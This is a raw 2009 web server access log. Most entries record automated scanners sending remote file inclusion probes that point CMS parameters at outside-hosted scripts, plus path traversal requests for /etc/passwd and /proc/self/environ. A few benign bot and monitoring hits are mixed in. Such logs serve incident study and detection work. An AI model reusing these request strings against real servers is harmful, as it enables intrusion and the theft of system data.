202.125.45.45 - - [12/Jul/2009:03:15:14 -0400] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
202.125.45.45 - - [12/Jul/2009:03:15:14 -0400] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
132.247.253.86 - - [12/Jul/2009:03:15:27 -0400] "GET /logs/access_log.Q109052300/xmlrpc.php? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
89.223.3.98 - - [12/Jul/2009:03:15:36 -0400] "GET /logs/error_log.Q109061700/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:15:36 -0400] "GET /logs/access_log.Q109053000/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:15:37 -0400] "GET /logs/error_log.Q109061700/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:15:37 -0400] "GET /logs/access_log.Q109053000/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
202.125.45.45 - - [12/Jul/2009:03:15:48 -0400] "GET /logs/access_log.Q109070800/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
66.67.141.222 - - [12/Jul/2009:03:16:18 -0400] "GET /logs/access_log.Q109061800/xmlrpc.php? HTTP/1.1" 404 235 "-" "libwww-perl/5.812"
66.67.141.222 - - [12/Jul/2009:03:16:19 -0400] "GET /xmlrpc.php? HTTP/1.1" 404 208 "-" "libwww-perl/5.812"
66.67.141.222 - - [12/Jul/2009:03:16:24 -0400] "GET /logs/xmlrpc.php? HTTP/1.1" 404 213 "-" "libwww-perl/5.812"
195.36.6.200 - - [12/Jul/2009:03:16:58 -0400] "GET /logs/error_log.Q109061800/xmlrpc.php? HTTP/1.1" 404 234 "-" "libwww-perl/5.823"
195.210.70.13 - - [12/Jul/2009:03:17:26 -0400] "GET /logs/error_log.Q109061800/xmlrpc.php? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
66.67.141.222 - - [12/Jul/2009:03:17:37 -0400] "GET /logs/access_log.Q109052300/xmlrpc.php? HTTP/1.1" 404 235 "-" "libwww-perl/5.812"
200.101.70.1 - - [12/Jul/2009:03:18:12 -0400] "GET /logs/access_log.Q109053000//include/admin.lib.inc.php?site_path=http://articlecentralstation.com/ab.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
220.231.126.252 - - [12/Jul/2009:03:19:05 -0400] "GET /logs/access_log.Q109051500//bbs//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:03:19:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.70 - - [12/Jul/2009:03:24:05 -0400] "GET /logs/access_log.Q107090600 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [12/Jul/2009:03:24:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
133.5.67.143 - - [12/Jul/2009:03:26:40 -0400] "GET /extras/ext_cats.php?dir_path=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
133.5.67.143 - - [12/Jul/2009:03:26:41 -0400] "GET /extras/ext_cats.php?dir_path=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
133.5.67.143 - - [12/Jul/2009:03:26:42 -0400] "GET /logs/extras/ext_cats.php?dir_path=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
133.5.67.143 - - [12/Jul/2009:03:26:42 -0400] "GET /logs/extras/ext_cats.php?dir_path=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
133.5.67.143 - - [12/Jul/2009:03:26:42 -0400] "GET /logs/access_log.Q109070800/extras/ext_cats.php?dir_path=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
133.5.67.143 - - [12/Jul/2009:03:26:43 -0400] "GET /logs/access_log.Q109070800%20%20/extras/ext_cats.php?dir_path=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:03:27:04 -0400] "GET /logs/access_log.Q109051500//bbs//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:03:27:11 -0400] "GET /logs/access_log.Q109060400////index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 237 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
84.207.17.120 - - [12/Jul/2009:03:27:11 -0400] "GET ////index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 210 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
89.223.3.98 - - [12/Jul/2009:03:27:32 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:27:32 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:27:32 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:27:33 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:27:33 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:27:33 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:27:38 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:27:38 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:27:38 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:27:40 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:27:40 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:27:40 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:27:52 -0400] "GET /logs/access_log.Q109062300/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:27:58 -0400] "GET /logs/access_log.Q109062300/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:28:05 -0400] "GET /logs/access_log.Q109062300%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:28:06 -0400] "GET /logs/access_log.Q109062300%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
213.222.13.89 - - [12/Jul/2009:03:28:31 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/r0x-id.txt? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
84.207.17.120 - - [12/Jul/2009:03:28:41 -0400] "GET /logs////index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.mops.krakow.pl/mambots/search/copyright.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:03:28:41 -0400] "GET ////index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.mops.krakow.pl/mambots/search/copyright.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:03:28:41 -0400] "GET ////index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.mops.krakow.pl/mambots/search/copyright.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:03:28:41 -0400] "GET /logs/access_log.Q109060400////index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.mops.krakow.pl/mambots/search/copyright.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:03:28:41 -0400] "GET /logs/access_log.Q109060400////index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.mops.krakow.pl/mambots/search/copyright.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:03:28:41 -0400] "GET /logs////index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.mops.krakow.pl/mambots/search/copyright.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:03:28:42 -0400] "GET ////index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.mops.krakow.pl/mambots/search/copyright.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:03:28:42 -0400] "GET /logs/access_log.Q109060400////index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.mops.krakow.pl/mambots/search/copyright.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:03:28:42 -0400] "GET ////index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.mops.krakow.pl/mambots/search/copyright.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:03:28:42 -0400] "GET /logs////index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.mops.krakow.pl/mambots/search/copyright.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:03:28:42 -0400] "GET /logs////index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.mops.krakow.pl/mambots/search/copyright.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:03:28:42 -0400] "GET /logs/access_log.Q109060400////index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.mops.krakow.pl/mambots/search/copyright.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:03:29:21 -0400] "GET //main.php?sayfa=http://www.atu.bz/ram/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:03:29:21 -0400] "GET /logs//main.php?sayfa=http://www.atu.bz/ram/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:03:29:21 -0400] "GET /logs/access_log.Q109051000%20%20//main.php?sayfa=http://www.atu.bz/ram/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:03:29:22 -0400] "GET /logs/access_log.Q109051800%20%20//main.php?sayfa=http://www.atu.bz/ram/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:03:29:43 -0400] "GET ////index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 210 "-" "libwww-perl/5.813"
209.59.12.99 - - [12/Jul/2009:03:29:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
133.5.67.143 - - [12/Jul/2009:03:29:48 -0400] "GET /logs/access_log.Q109050300%20%20/extras/ext_cats.php?dir_path=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
114.200.199.144 - - [12/Jul/2009:03:31:04 -0400] "GET /logs///?_CCFG[_PKG_PATH_INCL]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 200 9196 "-" "Mozilla/5.0"
114.200.199.144 - - [12/Jul/2009:03:31:05 -0400] "GET ///?_CCFG[_PKG_PATH_INCL]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
114.200.199.144 - - [12/Jul/2009:03:31:05 -0400] "GET /logs/access_log.Q109061100///?_CCFG[_PKG_PATH_INCL]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
65.55.105.237 - - [12/Jul/2009:03:31:28 -0400] "GET /logs/access_log.Q108011300 HTTP/1.1" 404 224 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
89.223.3.98 - - [12/Jul/2009:03:31:40 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:31:40 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:31:40 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:31:42 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:31:43 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:31:43 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
222.236.44.32 - - [12/Jul/2009:03:31:57 -0400] "GET /logs/index.php?sourcedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
222.236.44.32 - - [12/Jul/2009:03:31:57 -0400] "GET /logs/access_log.Q109051900/index.php?sourcedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
222.236.44.32 - - [12/Jul/2009:03:31:57 -0400] "GET /index.php?sourcedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
89.223.3.98 - - [12/Jul/2009:03:31:59 -0400] "GET /logs/access_log.Q109062300/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:32:36 -0400] "GET /logs/access_log.Q109062300/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
222.236.44.32 - - [12/Jul/2009:03:33:08 -0400] "GET /logs/access_log.Q109051900/index.php?sourcedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
222.236.44.32 - - [12/Jul/2009:03:33:08 -0400] "GET /index.php?sourcedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
222.236.44.32 - - [12/Jul/2009:03:33:08 -0400] "GET /logs/index.php?sourcedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
114.200.199.144 - - [12/Jul/2009:03:33:09 -0400] "GET /logs/access_log.Q109061100%20%20///?_CCFG[_PKG_PATH_INCL]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:03:34:43 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://www.atu.bz/ram/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:03:34:43 -0400] "GET /logs/access_log.Q109051800//main.php?sayfa=http://www.atu.bz/ram/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:03:34:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.70 - - [12/Jul/2009:03:34:56 -0400] "GET /images/items/0034020_thumb.jpg HTTP/1.1" 200 2494 "-" "Googlebot-Image/1.0"
72.30.78.244 - - [12/Jul/2009:03:34:59 -0400] "GET /logs/error_log.Q108113000 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
201.232.54.48 - - [12/Jul/2009:03:35:07 -0400] "GET /logs/error_log.Q109062300/?dir[func]=&dir[base]=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg?%0D?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
201.232.54.48 - - [12/Jul/2009:03:35:07 -0400] "GET /?dir[func]=&dir[base]=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg?%0D?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
201.232.54.48 - - [12/Jul/2009:03:35:07 -0400] "GET /logs/?dir[func]=&dir[base]=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg?%0D?? HTTP/1.1" 200 9190 "-" "libwww-perl/5.805"
84.207.17.120 - - [12/Jul/2009:03:35:38 -0400] "GET /logs/error_log.Q109060500%20%20////index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.mops.krakow.pl/mambots/search/copyright.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:03:35:38 -0400] "GET /logs/error_log.Q109060500%20%20////index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.mops.krakow.pl/mambots/search/copyright.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:03:35:53 -0400] "GET /logs/error_log.Q109060500%20%20////index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.mops.krakow.pl/mambots/search/copyright.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.27.203.107 - - [12/Jul/2009:03:35:55 -0400] "GET /logs/access_log.Q109061700///errors.php?error=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.27.203.107 - - [12/Jul/2009:03:35:55 -0400] "GET /logs///errors.php?error=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
218.27.203.107 - - [12/Jul/2009:03:35:55 -0400] "GET /logs/access_log.Q109060400///errors.php?error=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:03:36:06 -0400] "GET /logs/error_log.Q109052300%20%20////index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.mops.krakow.pl/mambots/search/copyright.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:03:36:09 -0400] "GET /logs/error_log.Q109052300%20%20////index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.mops.krakow.pl/mambots/search/copyright.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:03:36:10 -0400] "GET /logs/error_log.Q109052300%20%20////index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.mops.krakow.pl/mambots/search/copyright.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:03:36:17 -0400] "GET /logs/error_log.Q109060500%20%20////index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.mops.krakow.pl/mambots/search/copyright.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
84.207.17.120 - - [12/Jul/2009:03:36:30 -0400] "GET /logs/error_log.Q109052300%20%20////index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.mops.krakow.pl/mambots/search/copyright.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
72.30.78.244 - - [12/Jul/2009:03:36:40 -0400] "GET /logs/access_log.Q109062900 HTTP/1.0" 200 5053948 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
91.202.4.158 - - [12/Jul/2009:03:37:18 -0400] "GET /include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
91.202.4.158 - - [12/Jul/2009:03:37:18 -0400] "GET /logs/access_log.Q109060400/include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 236 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
91.202.4.158 - - [12/Jul/2009:03:37:18 -0400] "GET /logs/include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
91.202.4.158 - - [12/Jul/2009:03:37:18 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
91.202.4.158 - - [12/Jul/2009:03:37:18 -0400] "GET /logs/access_log.Q109060400/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
91.202.4.158 - - [12/Jul/2009:03:37:18 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
91.202.4.158 - - [12/Jul/2009:03:37:18 -0400] "GET /logs/include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 214 "-" "XXXXXX"
91.202.4.158 - - [12/Jul/2009:03:37:18 -0400] "GET /include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 209 "-" "XXXXXX"
91.202.4.158 - - [12/Jul/2009:03:37:18 -0400] "GET /logs/access_log.Q109060400/include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 236 "-" "XXXXXX"
91.202.4.158 - - [12/Jul/2009:03:37:18 -0400] "GET /include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "XXXXXX"
91.202.4.158 - - [12/Jul/2009:03:37:18 -0400] "GET /logs/access_log.Q109060400/include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 236 "-" "XXXXXX"
91.202.4.158 - - [12/Jul/2009:03:37:18 -0400] "GET /logs/include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 214 "-" "XXXXXX"
72.30.78.244 - - [12/Jul/2009:03:37:02 -0400] "GET /logs/access_log.Q109060600 HTTP/1.0" 200 2519002 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [12/Jul/2009:03:39:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.202.4.158 - - [12/Jul/2009:03:39:53 -0400] "GET /logs/access_log.Q109053000/include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 236 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
91.202.4.158 - - [12/Jul/2009:03:39:53 -0400] "GET /logs/access_log.Q109053000/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
91.202.4.158 - - [12/Jul/2009:03:39:53 -0400] "GET /logs/access_log.Q109053000/include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 236 "-" "XXXXXX"
91.202.4.158 - - [12/Jul/2009:03:39:54 -0400] "GET /logs/access_log.Q109053000/include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 236 "-" "XXXXXX"
84.121.224.247 - - [12/Jul/2009:03:39:59 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; es-es) AppleWebKit/530.18 (KHTML, like Gecko) Version/4.0.1 Safari/530.18"
